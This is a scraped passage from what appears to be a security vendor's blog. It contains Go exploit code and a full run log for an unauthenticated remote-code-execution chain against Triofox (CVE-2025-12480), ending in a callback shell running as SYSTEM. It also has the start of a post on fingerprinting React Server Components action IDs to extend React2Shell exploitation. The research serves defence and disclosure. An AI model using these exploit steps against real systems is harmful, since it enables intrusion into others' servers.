conf.GenerateURL(\"\u002Fmanagement\u002FAdminDatabase.aspx\"), params, headers)\nif !ok {\n    output.PrintError(\"Could not POST to the admin database 
endpoint\")\n\n    return false\n}\n",[886,20576,20577,20596,20654,20665,20686,20690,20696,20700,20704,20721,20725,20730,20735,20764,20785,20805,20809,20829,20852,20909,20919,20938,20942,20948,20952,20956,20961,20975,20998,21052,21062,21080,21084,21090],{"__ignoreMap":219},[1373,20578,20579,20582,20585,20588,20590,20593],{"class":1375,"line":1376},[1373,20580,20581],{"class":4640},"state ",[1373,20583,20584],{"class":1397},":=",[1373,20586,20587],{"class":14938}," aspnet",[1373,20589,59],{"class":1383},[1373,20591,20592],{"class":14938},"State",[1373,20594,20595],{"class":1383},"{}\n",[1373,20597,20598,20601,20603,20606,20608,20611,20613,20616,20618,20621,20623,20625,20627,20629,20631,20634,20636,20639,20641,20643,20646,20648,20650,20652],{"class":1375,"line":220},[1373,20599,20600],{"class":4640},"resp",[1373,20602,5437],{"class":1383},[1373,20604,20605],{"class":4640}," body",[1373,20607,5437],{"class":1383},[1373,20609,20610],{"class":4640}," ok ",[1373,20612,20584],{"class":1397},[1373,20614,20615],{"class":4640}," protocol",[1373,20617,59],{"class":1383},[1373,20619,20620],{"class":7297},"HTTPSendAndRecvWith",[1373,20622,1384],{"class":1383},[1373,20624,183],{"class":1387},[1373,20626,6284],{"class":1391},[1373,20628,183],{"class":1387},[1373,20630,5437],{"class":1383},[1373,20632,20633],{"class":4640}," conf",[1373,20635,59],{"class":1383},[1373,20637,20638],{"class":7297},"GenerateURL",[1373,20640,1384],{"class":1383},[1373,20642,183],{"class":1387},[1373,20644,20645],{"class":1391},"\u002Fmanagement\u002FAdminDatabase.aspx",[1373,20647,183],{"class":1387},[1373,20649,15534],{"class":1383},[1373,20651,16579],{"class":1387},[1373,20653,11875],{"class":1383},[1373,20655,20656,20658,20660,20663],{"class":1375,"line":1266},[1373,20657,4637],{"class":4636},[1373,20659,7370],{"class":1397},[1373,20661,20662],{"class":4640},"ok 
",[1373,20664,8904],{"class":1383},[1373,20666,20667,20670,20672,20675,20677,20679,20682,20684],{"class":1375,"line":1852},[1373,20668,20669],{"class":4640},"    output",[1373,20671,59],{"class":1383},[1373,20673,20674],{"class":7297},"PrintError",[1373,20676,1384],{"class":1383},[1373,20678,183],{"class":1387},[1373,20680,20681],{"class":1391},"Could not retrieve to the admin database endpoint",[1373,20683,183],{"class":1387},[1373,20685,11875],{"class":1383},[1373,20687,20688],{"class":1375,"line":4692},[1373,20689,6520],{"emptyLinePlaceholder":237},[1373,20691,20692,20694],{"class":1375,"line":4724},[1373,20693,7340],{"class":4636},[1373,20695,16195],{"class":14985},[1373,20697,20698],{"class":1375,"line":4756},[1373,20699,1855],{"class":1383},[1373,20701,20702],{"class":1375,"line":4768},[1373,20703,6520],{"emptyLinePlaceholder":237},[1373,20705,20706,20709,20711,20714,20716,20719],{"class":1375,"line":4792},[1373,20707,20708],{"class":4640},"state",[1373,20710,59],{"class":1383},[1373,20712,20713],{"class":7297},"Update",[1373,20715,1384],{"class":1383},[1373,20717,20718],{"class":4640},"body",[1373,20720,11875],{"class":1383},[1373,20722,20723],{"class":1375,"line":4798},[1373,20724,6520],{"emptyLinePlaceholder":237},[1373,20726,20727],{"class":1375,"line":4806},[1373,20728,20729],{"class":4630},"\u002F\u002F Now only the parameters that are required can be utilized and no special body parsing\n",[1373,20731,20732],{"class":1375,"line":4817},[1373,20733,20734],{"class":4630},"\u002F\u002F for __VIEWSTATE and friends is required.\n",[1373,20736,20737,20740,20742,20745,20747,20750,20752,20754,20756,20758,20760,20762],{"class":1375,"line":4825},[1373,20738,20739],{"class":4640},"p ",[1373,20741,20584],{"class":1397},[1373,20743,20744],{"class":4640}," 
state",[1373,20746,59],{"class":1383},[1373,20748,20749],{"class":7297},"MergeParams",[1373,20751,1384],{"class":1383},[1373,20753,13964],{"class":1397},[1373,20755,7035],{"class":1383},[1373,20757,15752],{"class":7293},[1373,20759,15050],{"class":1383},[1373,20761,15752],{"class":7293},[1373,20763,8904],{"class":1383},[1373,20765,20766,20768,20771,20773,20775,20778,20781,20783],{"class":1375,"line":4835},[1373,20767,19050],{"class":1387},[1373,20769,20770],{"class":1391},"__EVENTTARGET",[1373,20772,183],{"class":1387},[1373,20774,4606],{"class":1383},[1373,20776,20777],{"class":1387},"                      \"",[1373,20779,20780],{"class":1391},"ctl00$MainContent$DatabaseType",[1373,20782,183],{"class":1387},[1373,20784,9062],{"class":1383},[1373,20786,20787,20789,20792,20794,20796,20798,20801,20803],{"class":1375,"line":4843},[1373,20788,19050],{"class":1387},[1373,20790,20791],{"class":1391},"ctl00%24MainContent%24DatabaseType",[1373,20793,183],{"class":1387},[1373,20795,4606],{"class":1383},[1373,20797,4883],{"class":1387},[1373,20799,20800],{"class":1391},"psql",[1373,20802,183],{"class":1387},[1373,20804,9062],{"class":1383},[1373,20806,20807],{"class":1375,"line":4849},[1373,20808,9809],{"class":1383},[1373,20810,20811,20814,20816,20818,20820,20823,20825,20827],{"class":1375,"line":4877},[1373,20812,20813],{"class":4640},"params 
",[1373,20815,20584],{"class":1397},[1373,20817,20615],{"class":4640},[1373,20819,59],{"class":1383},[1373,20821,20822],{"class":7297},"CreateRequestParamsEncoded",[1373,20824,1384],{"class":1383},[1373,20826,18],{"class":4640},[1373,20828,11875],{"class":1383},[1373,20830,20831,20833,20835,20837,20839,20841,20843,20845,20847,20850],{"class":1375,"line":4915},[1373,20832,4740],{"class":4640},[1373,20834,7035],{"class":1383},[1373,20836,183],{"class":1387},[1373,20838,6391],{"class":1391},[1373,20840,183],{"class":1387},[1373,20842,15050],{"class":1383},[1373,20844,8575],{"class":1397},[1373,20846,4883],{"class":1387},[1373,20848,20849],{"class":1391},"application\u002Fx-www-form-urlencoded",[1373,20851,19057],{"class":1387},[1373,20853,20854,20856,20858,20860,20862,20864,20866,20868,20870,20873,20875,20877,20879,20881,20883,20885,20887,20889,20891,20893,20895,20897,20899,20902,20904,20907],{"class":1375,"line":4931},[1373,20855,20600],{"class":4640},[1373,20857,5437],{"class":1383},[1373,20859,20605],{"class":4640},[1373,20861,5437],{"class":1383},[1373,20863,20610],{"class":4640},[1373,20865,5417],{"class":1397},[1373,20867,20615],{"class":4640},[1373,20869,59],{"class":1383},[1373,20871,20872],{"class":7297},"HTTPSendAndRecvWithHeaders",[1373,20874,1384],{"class":1383},[1373,20876,183],{"class":1387},[1373,20878,6946],{"class":1391},[1373,20880,183],{"class":1387},[1373,20882,5437],{"class":1383},[1373,20884,20633],{"class":4640},[1373,20886,59],{"class":1383},[1373,20888,20638],{"class":7297},[1373,20890,1384],{"class":1383},[1373,20892,183],{"class":1387},[1373,20894,20645],{"class":1391},[1373,20896,183],{"class":1387},[1373,20898,15534],{"class":1383},[1373,20900,20901],{"class":4640}," params",[1373,20903,5437],{"class":1383},[1373,20905,20906],{"class":4640}," 
headers",[1373,20908,11875],{"class":1383},[1373,20910,20911,20913,20915,20917],{"class":1375,"line":4947},[1373,20912,4637],{"class":4636},[1373,20914,7370],{"class":1397},[1373,20916,20662],{"class":4640},[1373,20918,8904],{"class":1383},[1373,20920,20921,20923,20925,20927,20929,20931,20934,20936],{"class":1375,"line":4952},[1373,20922,20669],{"class":4640},[1373,20924,59],{"class":1383},[1373,20926,20674],{"class":7297},[1373,20928,1384],{"class":1383},[1373,20930,183],{"class":1387},[1373,20932,20933],{"class":1391},"Could not POST to the admin database endpoint",[1373,20935,183],{"class":1387},[1373,20937,11875],{"class":1383},[1373,20939,20940],{"class":1375,"line":6776},[1373,20941,6520],{"emptyLinePlaceholder":237},[1373,20943,20944,20946],{"class":1375,"line":6781},[1373,20945,7340],{"class":4636},[1373,20947,16195],{"class":14985},[1373,20949,20950],{"class":1375,"line":7524},[1373,20951,1855],{"class":1383},[1373,20953,20954],{"class":1375,"line":7530},[1373,20955,6520],{"emptyLinePlaceholder":237},[1373,20957,20958],{"class":1375,"line":7546},[1373,20959,20960],{"class":4630},"\u002F\u002F Update the state from the previous POST response, this time we only want the states and have no 
content\n",[1373,20962,20963,20965,20967,20969,20971,20973],{"class":1375,"line":7571},[1373,20964,20708],{"class":4640},[1373,20966,59],{"class":1383},[1373,20968,20713],{"class":7297},[1373,20970,1384],{"class":1383},[1373,20972,20718],{"class":4640},[1373,20974,11875],{"class":1383},[1373,20976,20977,20979,20981,20983,20985,20987,20989,20991,20993,20996],{"class":1375,"line":7598},[1373,20978,20813],{"class":4640},[1373,20980,20584],{"class":1397},[1373,20982,20615],{"class":4640},[1373,20984,59],{"class":1383},[1373,20986,20822],{"class":7297},[1373,20988,1384],{"class":1383},[1373,20990,20708],{"class":4640},[1373,20992,59],{"class":1383},[1373,20994,20995],{"class":7297},"AsParams",[1373,20997,11781],{"class":1383},[1373,20999,21000,21002,21004,21006,21008,21010,21012,21014,21016,21018,21020,21022,21024,21026,21028,21030,21032,21034,21036,21038,21040,21042,21044,21046,21048,21050],{"class":1375,"line":7615},[1373,21001,20600],{"class":4640},[1373,21003,5437],{"class":1383},[1373,21005,20605],{"class":4640},[1373,21007,5437],{"class":1383},[1373,21009,20610],{"class":4640},[1373,21011,20584],{"class":1397},[1373,21013,20615],{"class":4640},[1373,21015,59],{"class":1383},[1373,21017,20872],{"class":7297},[1373,21019,1384],{"class":1383},[1373,21021,183],{"class":1387},[1373,21023,6946],{"class":1391},[1373,21025,183],{"class":1387},[1373,21027,5437],{"class":1383},[1373,21029,20633],{"class":4640},[1373,21031,59],{"class":1383},[1373,21033,20638],{"class":7297},[1373,21035,1384],{"class":1383},[1373,21037,183],{"class":1387},[1373,21039,20645],{"class":1391},[1373,21041,183],{"class":1387},[1373,21043,15534],{"class":1383},[1373,21045,20901],{"class":4640},[1373,21047,5437],{"class":1383},[1373,21049,20906],{"class":4640},[1373,21051,11875],{"class":1383},[1373,21053,21054,21056,21058,21060],{"class":1375,"line":7635},[1373,21055,4637],{"class":4636},[1373,21057,7370],{"class":1397},[1373,21059,20662],{"class":4640},[1373,21061,8904],{"class":1383},[1373,21063,2
1064,21066,21068,21070,21072,21074,21076,21078],{"class":1375,"line":7640},[1373,21065,20669],{"class":4640},[1373,21067,59],{"class":1383},[1373,21069,20674],{"class":7297},[1373,21071,1384],{"class":1383},[1373,21073,183],{"class":1387},[1373,21075,20933],{"class":1391},[1373,21077,183],{"class":1387},[1373,21079,11875],{"class":1383},[1373,21081,21082],{"class":1375,"line":7648},[1373,21083,6520],{"emptyLinePlaceholder":237},[1373,21085,21086,21088],{"class":1375,"line":7672},[1373,21087,7340],{"class":4636},[1373,21089,16195],{"class":14985},[1373,21091,21092],{"class":1375,"line":7688},[1373,21093,1855],{"class":1383},[61,21095,21097],{"id":21096},"just-run-the-exploit","Just Run the Exploit",[18,21099,21100],{},"In the end we now have an embedded PostgreSQL server, a new shiny set of ASP.NET session state helper functions, an undocumented path bypass for creating a share, a dream, and an exploit that takes a sum total of 26 HTTP requests. The culmination of this is a full unauthenticated remote code execution exploit that mirrors the attack path of the threat actor:",[1354,21102,21105],{"className":21103,"code":21104,"language":1359},[1357],"poptart@grimm $ .\u002Fbuild\u002Fcve-2025-12480_linux-amd64 -rhost 10.0.0.68 -rport 80 -lhost 10.0.1.10 -lport 1337 -timeout 30 -v -c -e\ntime=2025-11-25T14:24:17.692-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.68 port=80 ssl=false \"ssl auto\"=false\ntime=2025-11-25T14:24:17.692-07:00 level=STATUS msg=\"Validating Gladinet Triofox target\" host=10.0.0.68 port=80\ntime=2025-11-25T14:24:17.706-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.68 port=80 verified=true\ntime=2025-11-25T14:24:17.706-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.68 port=80\ntime=2025-11-25T14:24:17.719-07:00 level=VERSION msg=\"The reported version is 16.4.10317.56372\" host=10.0.0.68 port=80 version=16.4.10317.56372\ntime=2025-11-25T14:24:17.719-07:00 level=SUCCESS 
msg=\"The target appears to be a vulnerable version!\" host=10.0.0.68 port=80 vulnerable=yes\ntime=2025-11-25T14:24:17.719-07:00 level=STATUS msg=\"Starting embedded PostgreSQL server\"\ntime=2025-11-25T14:24:17.719-07:00 level=STATUS msg=\"Starting an HTTP server on 10.0.1.10:1337\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"PostgreSQL server started\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"Modifying PostgreSQL pg_hba.conf to allow remote connections\"\ntime=2025-11-25T14:24:21.268-07:00 level=STATUS msg=\"Reloading PostgreSQL server config for remote connections\"\ntime=2025-11-25T14:24:26.953-07:00 level=STATUS msg=\"PostgreSQL fully configured\"\ntime=2025-11-25T14:24:26.953-07:00 level=STATUS msg=\"Attempting to access the admin database endpoint with localhost header\"\ntime=2025-11-25T14:24:26.958-07:00 level=STATUS msg=\"Selecting PostgreSQL in database state\"\ntime=2025-11-25T14:24:26.962-07:00 level=STATUS msg=\"Creating new PostgreSQL database\"\ntime=2025-11-25T14:24:39.056-07:00 level=STATUS msg=\"Selecting No AD Option\"\ntime=2025-11-25T14:24:45.110-07:00 level=STATUS msg=\"Creating new local user account\"\ntime=2025-11-25T14:24:45.111-07:00 level=STATUS msg=\"Creating account with the following email and password: mkjva@xmsoq.org:c13b6f587\"\ntime=2025-11-25T14:24:45.119-07:00 level=STATUS msg=\"Following redirect with cookies\"\ntime=2025-11-25T14:24:45.421-07:00 level=STATUS msg=\"Initializing configuration for AD\"\ntime=2025-11-25T14:24:45.423-07:00 level=STATUS msg=\"Following first redirect from creation of AD settings\"\ntime=2025-11-25T14:24:45.710-07:00 level=STATUS msg=\"Following second redirect from checkout and updating cookies\"\ntime=2025-11-25T14:24:46.435-07:00 level=STATUS msg=\"Following redirect to admin console with new cookies\"\ntime=2025-11-25T14:24:47.137-07:00 level=STATUS msg=\"Enabling Home Drive\"\ntime=2025-11-25T14:24:47.436-07:00 level=STATUS msg=\"Creating directory in home 
drive\"\ntime=2025-11-25T14:24:53.578-07:00 level=STATUS msg=\"Created directory: aLbYFbPvZvFuYD\"\ntime=2025-11-25T14:24:53.578-07:00 level=STATUS msg=\"Creating payload file in home directory\"\ntime=2025-11-25T14:24:57.633-07:00 level=STATUS msg=\"Created file: nsFCZFzFvxHYbbwU.vbs\"\ntime=2025-11-25T14:24:57.651-07:00 level=STATUS msg=\"Created file: IQbneKjteHuZlTxMpe.bat\"\ntime=2025-11-25T14:24:57.651-07:00 level=STATUS msg=\"Setting antivirus scanner to payload\"\ntime=2025-11-25T14:24:57.971-07:00 level=STATUS msg=\"Enable editing AntiVirus settings\"\ntime=2025-11-25T14:24:57.976-07:00 level=STATUS msg=\"Selecting AntiVirus settings to ESET\"\ntime=2025-11-25T14:24:57.980-07:00 level=STATUS msg=\"Setting AntiVirus settings for ESET to our VBS script\"\ntime=2025-11-25T14:24:57.992-07:00 level=STATUS msg=\"Creating file to trigger AV scan. A timeout and error are expected.\"\ntime=2025-11-25T14:24:58.158-07:00 level=SUCCESS msg=\"Received initial connection from 10.0.0.68:49809, entering shell\"\nlast seen: 0ms> whoami\nlast seen: 0ms> 10.0.0.68:49809: nt authority\\system\nexit\ntime=2025-11-25T14:25:05.014-07:00 level=STATUS msg=\"Exit received, shutting down\"\ntime=2025-11-25T14:25:05.016-07:00 level=STATUS msg=\"Shutting down the HTTP Server\"\ntime=2025-11-25T14:25:05.016-07:00 level=STATUS msg=\"C2 server exited\"\ntime=2025-11-25T14:25:28.014-07:00 level=ERROR msg=\"HTTP request error: Put \\\"http:\u002F\u002F10.0.0.68:80\u002Fstorage\u002Fproxiedupload.up\\\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\"\ntime=2025-11-25T14:25:28.014-07:00 level=ERROR msg=\"Could not retrieve to the home drive endpoint\"\ntime=2025-11-25T14:25:31.718-07:00 level=STATUS msg=\"Attempting to reset the database to default and exit\"\ntime=2025-11-25T14:25:31.718-07:00 level=STATUS msg=\"Attempting to access the admin database endpoint with localhost header\"\ntime=2025-11-25T14:25:52.154-07:00 level=STATUS msg=\"Resetting database to 
default embedded\"\ntime=2025-11-25T14:25:55.238-07:00 level=STATUS msg=\"Database reset\"\n",[886,21106,21104],{"__ignoreMap":219},[18,21108,21109,21110,21115],{},"In summary, ",[47,21111,21114],{"href":21112,"rel":21113},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-12480",[51],"CVE-2025-12480"," serves as an excellent example of how an exploit that sounds relatively simple in public writeups can turn out to be significantly more complex when accounting for real-world attack paths and solving for non-trivial attacker infrastructure challenges.",[61,21117,202],{"id":201},[18,21119,19423,21120,1246,21123,1255,21126,59],{},[47,21121,19428],{"href":19426,"rel":21122},[51],[47,21124,19432],{"href":13214,"rel":21125},[51],[47,21127,19437],{"href":19435,"rel":21128},[51],[18,21130,1228,21131,1234,21134,1240,21137,1246,21140,1255,21143,1260],{},[47,21132,1233],{"href":10806,"rel":21133},[51],[47,21135,1239],{"href":1237,"rel":21136},[51],[47,21138,1245],{"href":1243,"rel":21139},[51],[47,21141,1251],{"href":1249,"rel":21142},[51],[47,21144,216],{"href":1258,"rel":21145},[51],[2901,21147,21148],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki 
code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: 
var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":21150},[21151,21152,21153,21154,21155,21156],{"id":20210,"depth":220,"text":20211},{"id":20233,"depth":220,"text":20234},{"id":20305,"depth":220,"text":20306},{"id":20391,"depth":220,"text":20392},{"id":21096,"depth":220,"text":21097},{"id":201,"depth":220,"text":202},"Triofox CVE-2025-12480 exploitation from beginning to end, all sharp edges included.",{"slug":21159},"triofox-exploit-CVE-2025-12480","\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",{"title":10339,"description":21157},"blog\u002Ftriofox-exploit-CVE-2025-12480",[242,1281,1279],"6PSuJVgplVYTGmDWcvqogj7LPXRxVviGaFU3cUc2FGo",{"id":21166,"title":21167,"articles":7,"authors":21168,"body":21171,"date":21746,"description":21747,"extension":234,"image":7,"link":7,"meta":21748,"navigation":237,"path":21750,"seo":21751,"series":7,"stem":21752,"subtype":7,"tags":21753,"__hash__":21754},"blog\u002Fblog\u002Freact2shell-beyond-nextjs.md","What's Next: React2Shell 
Beyond Next.js",[21169,21170],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":21172,"toc":21738},[21173,21176,21179,21193,21196,21200,21203,21222,21232,21235,21239,21246,21255,21261,21267,21289,21294,21298,21301,21311,21316,21320,21327,21332,21336,21342,21347,21351,21354,21358,21370,21373,21377,21402,21413,21419,21424,21428,21431,21438,21445,21455,21466,21469,21475,21478,21481,21484,21490,21501,21504,21509,21513,21519,21522,21529,21535,21542,21549,21552,21558,21565,21586,21597,21607,21620,21623,21626,21635,21642,21655,21658,21663,21667,21670,21702,21704,21721],[263,21174],{":list":21175,"ico":266,"title":20},"[\"Next.js has been a primary target for React2Shell exploitation, but there are various other vulnerable frameworks that are exploitable when React Server components (RSC) is enabled.\",\"VulnCheck has developed exploits for four vulnerable frameworks outside of Next.js: React RSC, React Router, Expo, and Waku.\",\"In this blog, we investigate  exploitation patterns for each of the frameworks and the impact of subtle differences on detection and exploitation.\"]",[1920,21177,21167],{"id":21178},"whats-next-react2shell-beyond-nextjs",[18,21180,21181,21182,21186,21187,21192],{},"Since React2Shell (CVE-2025-55182) hit the first week of December, ",[47,21183,21185],{"href":1243,"rel":21184},[51],"VulnCheck’s Initial Access Intelligence (IAI)"," team has been hard at work exploring initial access exploit scenarios to give customers the best possible understanding of both known and likely attack vectors. While Next.js is understandably the focus area for many response teams given its huge deployment footprint, VulnCheck has also verified and developed functional exploits for four additional React2Shell exploit variants that target frameworks beyond Next.js. 
Most of these other variants require the experimental React Server Components (RSC) functionality to be explicitly enabled (and used in a particular manner), so we wouldn’t expect them to present the same type of ready-to-go attack surface that default ",[47,21188,21191],{"href":21189,"rel":21190},"http:\u002F\u002FNext.js",[51],"Next.js"," applications offered. Still, we believe it’s worth considering additional remote attack vectors, even if they don’t have the scale and broad appeal of vulnerable Next.js apps.",[18,21194,21195],{},"In this blog, we will look at React2Shell exploit variants that have been paid much less attention — and in some cases, virtually no attention at all.",[993,21197,21199],{"id":21198},"additional-frameworks","Additional Frameworks",[18,21201,21202],{},"The original React disclosure blog on CVE-2025-55182 notes that a number of different frameworks are vulnerable, including but not limited to Next.js:",[22,21204,21205,21207,21210,21213,21216,21219],{},[25,21206,21191],{},[25,21208,21209],{},"Vite RSC plugin",[25,21211,21212],{},"Parcel RSC plugin",[25,21214,21215],{},"React Router RSC preview",[25,21217,21218],{},"RedwoodSDK",[25,21220,21221],{},"Waku",[18,21223,21224,21227,21228,21231],{},[47,21225,21191],{"href":21189,"rel":21226},[51]," certainly offered the largest attack surface area, but once a public exploit targeting ",[47,21229,21191],{"href":21189,"rel":21230},[51]," applications was out, the rest of the frameworks seemed to fall by the wayside in the industry discourse on this vulnerability. The VulnCheck research team spent some time assessing  these less-examined frameworks to see what React2Shell exploit variants might need to look like and how we could provide our customers with specific coverage for those variants.",[18,21233,21234],{},"The team has broken down each vulnerable framework we have looked at so far, highlighting similarities and differences we found in payload development and fingerprinting patterns. 
This information is intended to aid others in the community for not only building out their own defense and detection capabilities, but also to offer new insight that can aid organizations in their own investigations into potentially vulnerable frameworks beyond Next.js.",[993,21236,21238],{"id":21237},"react-rsc","React RSC",[18,21240,21241,21242,21245],{},"The React project itself, where CVE-2025-55182 originated, gives a good baseline for understanding how request handling is shared across the other frameworks and where exploitable components propagated into the rest of the ecosystem. Unlike Next.js applications that utilize vulnerable RSC functionality by default, the core React RSC functionality requires explicit usage of RSC in the application in order for it to be exploitable; in other words, RSC has to be a feature of the bundler, or used in ",[886,21243,21244],{},"use server"," directives.",[18,21247,21248,21249,21254],{},"We first looked at the ",[47,21250,21253],{"href":21251,"rel":21252},"https:\u002F\u002Fparceljs.org\u002Frecipes\u002Frsc\u002F",[51],"Parcel bundler's RSC integration"," and set up a small demo application from the project's example repositories. The requests to the RSC endpoint may look familiar to those who have analyzed React2Shell internals:",[68,21256],{"src":21257,"alt":21258,"className":21259},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F1-light.png","Image 1",[10876,21260],"dark:hidden",[68,21262],{"src":21263,"alt":21258,"className":21264},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F1.png",[21265,21266],"hidden","dark:block",[18,21268,21269,21270,21273,21274,21277,21278,21281,21282,21284,21285,21288],{},"There are a few things that stand out in the request that do not match Next.js exploitation patterns. 
The primary request differences relate to the ",[886,21271,21272],{},"rsc-action-id"," header and the ",[886,21275,21276],{},"$ACTION_ID"," variable, which share the generated variable name, in this case ",[886,21279,21280],{},"a13z6#createTodo",". Modification of the body ",[886,21283,21276],{}," changes some of the internal paths, but doesn’t always seem to be required to hit the known code paths. The same cannot be said for the ",[886,21286,21287],{},"rsc-action-id"," header; modifying it on our Parcel-built app throws the following error:",[68,21290],{"src":21291,"alt":21292,"className":21293},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F2-light.png","Image 2",[10876,21260],[68,21295],{"src":21296,"alt":21292,"className":21297},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F2.png",[21265,21266],[18,21299,21300],{},"From our testing with other bundlers and applications, that header is always required to correspond to a function on the server. While this might seem like an issue from an attacker's perspective, as it may be difficult to identify who is using the RSC integration, there are client-side effects of utilizing RSC functions that appear to have been largely missed in public analysis of React2Shell: the clients serve generated blobs on pages with client RSC integration that are fingerprintable.",[18,21302,21303,21304,21306,21307,21310],{},"For the Parcel app, the client gets sent a set of JavaScript blocks containing the ",[886,21305,21280],{}," variables; these also contain an easy-to-fingerprint ",[886,21308,21309],{},"self.__FLIGHT_DATA"," variable, such as this truncated example we see from visiting our application's page:",[68,21312],{"src":21313,"alt":21314,"className":21315},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F3-light.png","Image 3",[10876,21260],[68,21317],{"src":21318,"alt":21314,"className":21319},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F3.png",[21265,21266],[18,21321,21322,21323,21326],{},"An additional 
fingerprint is left behind if the application uses form data, and that can be seen being rendered directly in the HTML ",[886,21324,21325],{},"form"," element name:",[68,21328],{"src":21329,"alt":21330,"className":21331},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F4-light.png","Image 4",[10876,21260],[68,21333],{"src":21334,"alt":21330,"className":21335},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F4.png",[21265,21266],[18,21337,21338,21339,21341],{},"The combination of these two gives us all we need to effectively copy and paste payloads from the other React2Shell exploits. In our exploitation experiments, we simply modified our exploits to search the HTML for the action ID forms — or, if those were not available, we extracted the Flight data variables from the functions and applied those to the ",[886,21340,21272],{}," header:",[68,21343],{"src":21344,"alt":21345,"className":21346},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F5-light.png","Image 5",[10876,21260],[68,21348],{"src":21349,"alt":21345,"className":21350},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F5.png",[21265,21266],[18,21352,21353],{},"Based on our analysis, this means that attackers do have a relatively low-touch way to enumerate functions when they correspond to the React RSC integration, which may allow attackers who can reach these functions to fingerprint potential victims and automate exploitation steps.",[993,21355,21357],{"id":21356},"react-router","React Router",[18,21359,21360,21361,21366,21367,21369],{},"The React Router project also contains ",[47,21362,21365],{"href":21363,"rel":21364},"https:\u002F\u002Freactrouter.com\u002Fhow-to\u002Freact-server-components",[51],"experimental support for RSC",", which requires explicitly enabling the RSC integration via RSC Framework Mode. 
